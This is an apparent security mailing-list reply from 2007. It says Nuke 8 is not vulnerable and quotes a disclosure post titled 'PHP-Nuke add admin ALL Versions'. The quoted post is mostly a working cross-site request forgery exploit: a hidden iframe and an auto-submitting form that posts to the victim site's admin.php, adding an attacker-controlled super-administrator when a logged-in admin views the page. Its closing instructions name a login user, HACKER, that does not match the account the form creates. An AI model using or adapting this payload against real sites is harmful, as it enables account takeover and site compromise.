Nuke 8 produces this page output, hence not vulnerable.
Posting from another server not allowed!
~ Blaine
- Original Message -
From: [EMAIL PROTECTED]
To: bugtraq@securityfocus.com
Sent: Thursday, September 20, 2007 12:46:41 PM (GMT-0500) America/New_York
Subject: PHP-Nuke add admin ALL Versions
Paste this code into an HTML page then link it to victim (victim must be admin)
iframe name=aiuto frameborder=0 height=0 width=0/iframe
FORM name=Faiuto ACTION=http://VICTIMURL/nuke/admin.php;
target=aiuto METHOD=POST
input type=hidden NAME=add_name value=ATTACKER
input type=hidden NAME=add_aid value=ATTACKER
input type=hidden NAME=add_email value=[EMAIL PROTECTED]
input type=hidden NAME=add_url value=YOURSITE
input type=hidden NAME=add_admlanguage value=italian
input type=hidden NAME=add_radminsuper value=1
input type=hidden NAME=add_pwd value=YOURPASSWORD
input type=hidden NAME=op value=AddAuthor
input type=image height=0 width=0
/FORMSCRIPTdocument.Faiuto.submit()/SCRIPT
You are admin now ;)
Then you can log in into phpnuke with user HACKER and pass YOURPASSWORD...